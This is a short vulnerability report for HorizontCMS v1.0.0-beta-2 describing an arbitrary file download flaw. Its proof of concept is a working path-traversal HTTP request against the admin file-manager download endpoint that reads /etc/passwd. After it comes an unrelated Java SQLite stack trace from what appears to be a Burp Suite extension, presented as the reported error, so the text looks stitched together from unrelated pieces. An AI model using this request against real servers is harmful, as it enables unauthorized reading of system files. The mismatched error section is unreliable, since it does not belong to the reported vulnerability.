dota-st
Version: HorizontCMS v1.0.0-beta-2

Submit date: 2022-02-13

Description: Arbitrary file download vulnerability

POC:

```
GET /admin/file-manager/download?file=storage/images/header_images/../../../../../../../../etc/passwd HTTP/1.1
```
An error is reported when loading the db file.

Error details:

```
java.sql.SQLException: Error opening connection
 at org.sqlite.core.CoreConnection.open(CoreConnection.java:215)
 at org.sqlite.core.CoreConnection.(CoreConnection.java:76)
 at org.sqlite.jdbc3.JDBC3Connection.(JDBC3Connection.java:24)
 at org.sqlite.jdbc4.JDBC4Connection.(JDBC4Connection.java:23)
 at org.sqlite.SQLiteConnection.(SQLiteConnection.java:45)
 at org.sqlite.JDBC.createConnection(JDBC.java:114)
 at org.sqlite.JDBC.connect(JDBC.java:88)
 at java.sql/java.sql.DriverManager.getConnection(DriverManager.java:681)
 at java.sql/java.sql.DriverManager.getConnection(DriverManager.java:252)
 at burp.Bootstrap.DBHelper.(DBHelper.java:28)
 at burp.Ui.ProjectTableTag.clickChoiceProjectAction(ProjectTableTag.java:643)
 at burp.Ui.ProjectTableTag$9.actionPerformed(ProjectTableTag.java:319)...
```